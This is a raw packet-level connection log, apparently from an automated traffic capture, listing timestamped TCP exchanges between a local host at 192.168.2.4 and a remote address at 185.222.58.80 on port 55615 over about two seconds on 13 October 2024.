                                                                              Oct 13, 2024 21:02:27.771666050 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771677017 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771677017 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771687984 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771713018 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771755934 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771759033 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771780014 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771806002 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771812916 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771843910 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771851063 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771862984 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771864891 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771893024 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771903992 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771910906 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771915913 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771935940 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771948099 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771949053 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771960020 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771964073 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.771974087 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771986008 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.771994114 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772015095 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772021055 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772027016 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772054911 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772061110 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772067070 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772082090 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772100925 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772119999 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772133112 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772145033 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772159100 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772193909 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772200108 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772206068 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772226095 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772238970 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772257090 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772299051 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772300005 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772311926 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772346973 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772357941 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772368908 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772375107 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772397041 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772397995 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772439957 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772466898 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772479057 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772489071 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772525072 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772546053 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772551060 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772562981 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772608995 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772619963 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772631884 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772646904 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772658110 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772695065 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772717953 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772773981 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772785902 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772797108 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772818089 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772819042 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772830009 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772840023 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772840977 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772855997 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772866964 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772881985 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772895098 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772927046 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.772941113 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.772954941 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773000956 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773019075 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773206949 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773219109 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773241043 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773252964 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773263931 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773266077 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773274899 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773286104 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773288012 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773297071 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773319960 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773332119 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773335934 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773369074 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773387909 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773457050 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773479939 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773492098 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773504019 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773519993 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773530960 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773544073 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773554087 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773565054 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773566008 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773576975 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773581982 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773597956 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773598909 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773611069 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773622036 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.773622036 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773644924 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773657084 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773678064 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773689032 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773700953 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773721933 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773732901 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773744106 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773777962 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773788929 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773798943 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773837090 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773848057 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773860931 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773875952 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773911953 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.773955107 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.774002075 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.774024010 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.774035931 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.774075031 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.787668943 CEST4974255615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.792479992 CEST5561549742185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.804299116 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:27.809257984 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.902607918 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:27.944926977 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.132771015 CEST4974255615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.137923956 CEST5561549742185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.366475105 CEST5561549742185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.413703918 CEST4974255615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.762758017 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.793237925 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.798209906 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.973356962 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.974823952 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975195885 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975306988 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975419998 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975539923 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975665092 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975790024 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975877047 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.975989103 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.976073980 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.976190090 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.976269007 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.979994059 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980035067 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980062008 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980117083 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980143070 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980144978 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980174065 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980189085 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980216026 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980220079 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980268002 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980581999 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980631113 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980634928 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980658054 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980679989 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980686903 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980712891 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980735064 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980740070 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980765104 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980782986 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980845928 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980874062 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.980902910 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980933905 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.980953932 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981008053 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981017113 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981048107 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981072903 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981076002 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981113911 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981120110 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981147051 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981173038 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981178045 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981201887 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981213093 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981229067 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981241941 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981273890 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981275082 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981300116 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981323004 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981326103 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981350899 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981352091 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981380939 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981401920 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981408119 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981429100 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981450081 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981456041 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981475115 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981483936 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981507063 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981511116 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981529951 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981553078 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981566906 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981592894 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981616974 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981621027 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981648922 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981673002 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981676102 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981698990 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981724977 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981726885 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981754065 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981755018 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981780052 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981801987 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981806040 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981832027 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981853008 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981875896 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.981947899 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.981990099 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982000113 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982045889 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982070923 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982111931 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982120991 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982137918 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982163906 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982198000 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982198954 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982248068 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982378006 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982405901 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982429981 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982433081 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982455969 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982470036 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982481956 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982496977 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982522964 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982528925 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982548952 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982562065 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982573986 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982592106 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982600927 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982616901 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982637882 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982675076 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982705116 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982726097 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982729912 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982748985 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982775927 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982777119 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982803106 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982829094 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982832909 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982860088 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982868910 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982883930 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982912064 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.982950926 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.982978106 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983004093 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983005047 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983031988 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983033895 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983057022 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983078003 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983103991 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983129978 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983155966 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983158112 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983184099 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983185053 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983210087 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983210087 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983234882 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983256102 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983258009 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983282089 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983304977 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983309031 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983331919 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983335018 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983359098 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983361959 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983386040 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983407974 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983426094 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983436108 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983473063 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983480930 CEST4974155615192.168.2.4185.222.58.80
                                                                              Oct 13, 2024 21:02:28.983499050 CEST5561549741185.222.58.80192.168.2.4
                                                                              Oct 13, 2024 21:02:28.983511925 CEST4974155615192.168.2.4185.222.58.80
